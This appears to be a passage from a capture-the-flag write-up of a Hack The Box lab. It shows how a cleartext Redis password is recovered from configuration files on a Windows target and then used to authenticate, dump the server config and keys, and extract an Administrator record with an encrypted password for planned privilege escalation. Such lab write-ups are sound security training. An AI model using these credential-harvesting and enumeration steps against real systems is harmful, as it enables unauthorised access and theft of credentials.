Redis Configuration
Checking for Redis configuration files after conducting basic enumeration
ps c:\Program Files> ls Redis
directory: C:\Program Files\Redis
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/2/2021 7:31 AM Logs
-a---- 7/1/2016 3:54 PM 1024 EventLog.dll
-a---- 7/1/2016 3:52 PM 12618 Redis on Windows Release Notes.docx
-a---- 7/1/2016 3:52 PM 16769 Redis on Windows.docx
-a---- 7/1/2016 3:55 PM 406016 redis-benchmark.exe
-a---- 7/1/2016 3:55 PM 4370432 redis-benchmark.pdb
-a---- 7/1/2016 3:55 PM 257024 redis-check-aof.exe
-a---- 7/1/2016 3:55 PM 3518464 redis-check-aof.pdb
-a---- 7/1/2016 3:55 PM 268288 redis-check-dump.exe
-a---- 7/1/2016 3:55 PM 3485696 redis-check-dump.pdb
-a---- 7/1/2016 3:55 PM 482304 redis-cli.exe
-a---- 7/1/2016 3:55 PM 4517888 redis-cli.pdb
-a---- 7/1/2016 3:55 PM 1553408 redis-server.exe
-a---- 7/1/2016 3:55 PM 6909952 redis-server.pdb
-a---- 4/2/2021 7:39 AM 43962 redis.windows-service.conf
-a---- 4/2/2021 7:37 AM 43960 redis.windows.conf
-a---- 7/1/2016 9:17 AM 14265 Windows Service Documentation.docx the target redis server installation is made to the c:\Program Files\Redis directory
There are 2 configuration files; redis.windows-service.conf and redis.windows.conf
CLEARTEXT Password
PS C:\Program Files> cat Redis/*.conf | Where-Object { $_ -notlike '#*' }
requirepass kidvscat_yes_kidvscat
port 6379
loglevel notice
logfile "Logs/redis_log.txt"
syslog-enabled yes
syslog-ident redis
databases 16
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir ./
slave-serve-stale-data yes
slave-read-only yes
[...REDACTED...]These 2 configuration files contain a CLEARTEXT password; kidvscat_yes_kidvscat
I was initially unable to enumerate the target Redis server instance as it was locked behind authentication Now that I have the Redis password, I should be able to continue the enumeration
Redis
┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ redis-cli -h $IP
10.10.10.237:6379> AUTH kidvscat_yes_kidvscat
OKAuthenticated
INFO
10.10.10.237:6379> info
# Server
redis_version:3.0.504
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a4f7a6e86f2d60b3
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:WinSock_IOCP
process_id:7928
run_id:0cac6bd47cf18678a171e36577a12518d3574f9b
tcp_port:6379
uptime_in_seconds:42221
uptime_in_days:0
hz:10
lru_clock:10309810
config_file:C:\Program Files\Redis\redis.windows-service.conf
# Clients
connected_clients:5
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:778080
used_memory_human:759.84K
used_memory_rss:740312
used_memory_peak:778080
used_memory_peak_human:759.84K
used_memory_lua:36864
mem_fragmentation_ratio:0.95
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1704766405
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:23
total_commands_processed:2
instantaneous_ops_per_sec:0
total_net_input_bytes:532
total_net_output_bytes:760
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.58
used_cpu_user:0.88
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=03.0.504
connected_clients:5
db0:keys=4,expires=0,avg_ttl=0
CONFIG
10.10.10.237:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) "kidvscat_yes_kidvscat"
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) "Logs/redis_log.txt"
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "5"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "cluster-node-timeout"
76) "15000"
77) "cluster-migration-barrier"
78) "1"
79) "cluster-slave-validity-factor"
80) "10"
81) "repl-diskless-sync-delay"
82) "5"
83) "cluster-require-full-coverage"
84) "yes"
85) "no-appendfsync-on-rewrite"
86) "no"
87) "slave-serve-stale-data"
88) "yes"
89) "slave-read-only"
90) "yes"
91) "stop-writes-on-bgsave-error"
92) "yes"
93) "daemonize"
94) "no"
95) "rdbcompression"
96) "yes"
97) "rdbchecksum"
98) "yes"
99) "activerehashing"
100) "yes"
101) "repl-disable-tcp-nodelay"
102) "no"
103) "repl-diskless-sync"
104) "no"
105) "aof-rewrite-incremental-fsync"
106) "yes"
107) "aof-load-truncated"
108) "yes"
109) "appendonly"
110) "no"
111) "dir"
112) "c:\\Program Files\\Redis"
113) "maxmemory-policy"
114) "noeviction"
115) "appendfsync"
116) "everysec"
117) "save"
118) "jd 900 jd 300 jd 60"
119) "loglevel"
120) "notice"
121) "client-output-buffer-limit"
122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
123) "unixsocketperm"
124) "0"
125) "slaveof"
126) ""
127) "notify-keyspace-events"
128) ""
129) "bind"
130) ""dump.rdb
Keyspace
10.10.10.237:6379> INFO keyspace
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
10.10.10.237:6379> KEYS *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:ids:User"keyspace contains 4 keys
"pk:ids:MetaDataClass"
10.10.10.237:6379> GET "pk:ids:MetaDataClass"
(error) WRONGTYPE Operation against a key holding the wrong kind of valueattempting to extract the first key, "pk:ids:MetaDataClass", fails
This is likely due to the key being something else than a string or an integer and requires a special operator to display it
10.10.10.237:6379> TYPE "pk:ids:MetaDataClass"
settype command can be used to identify the type of the key. It contains a set
10.10.10.237:6379> SMEMBERS "pk:ids:MetaDataClass"
1) "ffffffff-ffff-ffff-ffff-ffffffffffff"fetching all the members of the set using smembers command returns a single member; "ffffffff-ffff-ffff-ffff-ffffffffffff"
As the name suggests this may just be metadata
Moving on
"pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379> GET "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"The "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff" key contains interesting set of JSON data structure.
This doesn’t necessary pinpoint anything but could mean anything
"pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> GET "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"the "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0" key appears to contains an encrypted credential of the administrator user
The value to the EncryptedPassword field matches the encrypted string found earlier in the configuration file of PortableKanban
The installed PortableKanban has been confirmed to be vulnerable to offline decryption
If this credential is indeed the system credential of the administrator user, privilege escalation is achievable
"pk:ids:User"
10.10.10.237:6379> GET "pk:ids:User"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> TYPE "pk:ids:User"
set
10.10.10.237:6379> SMEMBERS "pk:ids:User"
1) "e8e29158-d70d-44b1-a1ba-4949d52790a0"Nothing of note-worthy